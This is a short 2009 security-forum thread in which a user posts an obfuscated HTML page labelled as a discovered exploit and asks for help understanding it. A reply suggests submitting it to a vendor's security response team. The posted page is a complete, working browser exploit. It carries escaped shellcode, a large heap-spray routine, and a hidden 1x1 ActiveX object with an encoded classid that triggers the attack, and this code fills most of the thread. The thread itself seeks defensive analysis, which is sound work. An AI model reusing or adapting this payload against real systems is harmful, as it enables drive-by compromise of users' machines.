Endpoint Protection

 View Only

  • 1.  discover exploit

    Posted Jul 16, 2009 11:58 AM
    do you understand this code

    ===============================================================
    <html>
    <body>

    <div id="tkj"></div>
    <script>

    var jhg = unescape("%uadb8%ue749%ud911%ud9e1%u2474%u5af4%uc92b%u63b1%u4231%u8313%u04c2%u4203%uaba2%ufa12%u71ac%uce97%ue305%u0d9e%u6c94%u67d4%u8e0f%u93ef%ua72a%u9bfb%uc8cb%u2f8c%uaeaa%u73f4%ue831%uedaf%u9050%ud4a2%ub1f7%u632b%ua7c3%ufd72%u8939%u1496%u1b98%u6f7a%u8103%u62ee%u0f24%ue074%ua7b8%u4f04%u88c8%u58d9%ub122%u3a7c%ud650%u2c73%u4294%ube4b%u5385%u5a75%ucefb%u20a6%u3173%u1090%ue561%u400f%u9f38%u366a%u3a3a%u6cd2%uc5ea%ue1f1%ue518%u9b73%u4146%u0704%u29ec%uaee6%u908a%ub214%u4ab8%u6b03%u802b%u607a%u65ce%u4f0d%ufc69%u5577%u6bd6%ua54c%u5d8e%uf936%u235c%u654a%ud2a0%u0f08%u8cb9%u6f4b%u6133%u96b4%u67e4%ucaa7%u38f3%uca2e%u3219%uc6e8%u4f58%u2db3%u6104%uefb1%ue755%ue8ff%ue4d2%ud45e%u8886%u1abe%u2b2f%ubaea%u8586%uf321%u70d1%u6978%u39f3%ub84d%u0f95%uf424%u5e3f%uacda%u6be6%ue839%uf4f4%uc189%u3fcb%u9d6f%u7f10%u5a42%u2ae1%uc6fa%u947c%u909b%u3418%ub09f%u232d%ub196%u4975%uadaa%u5879%uabbf%u615f%u06ad%u70bf%u6bc3%u58cb%u7fec%u99cf%u76e0%ubec4%uef23%ucfd4%ucc23%ud309%u7436%ucd15%u6a37%uff68%u8953%ufd8a%ua73d%u069c%u9dc0%u0c90%ue6d0%u13bb%u8eff%u3fd7%u45f5%u37d1%u696f%u6dd6%u844d%u7a06%u9f9b%u782e%u96a9%u7311%uabc7%ued75%u2040%u7ef1%ue7ab%u09d6%u80bc%u8606%u1c23%u0e35%u8d8a%ue0cb%u25b3%u8904%ub64a%u4235%u59ce%uc2a7%udc3f%u245a%u561f%u53d0%uf5c0%uc276%u9fd1%u66ef%u4e4b%u1e9f%u0ee3");

    var kjsakdjia = "%25%75%30%41%30%41%25%75%30%41%30%41";
    var zxcvzxcj = unescape(kjsakdjia);
    var asdc = unescape(zxcvzxcj);


    var vzxcv = 20 + jhg.length;
    while (asdc.length < vzxcv) asdc += asdc;
    var vzxa = asdc.substring(0,vzxcv);
    var xcvasd = asdc.substring(0,asdc.length - vzxcv);
    while (xcvasd.length + vzxcv < 851968) xcvasd = xcvasd + xcvasd + vzxa;

    var basd = new Array();
    for (i = 0; i < 200; i++){ basd[i] = xcvasd + jhg }

    var kjghcmak=document.createElement('object');

    document.getElementById('tkj').appendChild(kjghcmak);

    kjghcmak.width='1';

    kjghcmak.height='1';

    kjghcmak.data='./a.gif';
    var kjv = "%63%6C%73%69%64%3A%30%39%35%35%41%43%36%32%2D%42%46%32%45%2D%34%43%42%41%2D%41%32%42%39%2D%41%36%33%46%37%37%32%44%34%36%43%46";

    kjv = unescape(kjv);

    kjghcmak.classid=kjv;
    </script>


    </body>
    </html>
    ===============================================================================================


  • 2.  RE: discover exploit

    Posted Jul 16, 2009 12:00 PM
    please help me this code


  • 3.  RE: discover exploit

    Posted Jul 16, 2009 12:00 PM
    please help me this code


  • 4.  RE: discover exploit

    Posted Jul 16, 2009 12:09 PM
    Looks like Javascript in another language. Was this code received in an email? Was a threat detected pointing to this code?

    I would submit this the Secuity response team for analysis.

    http://www.symantec.com/security_response/index.jsp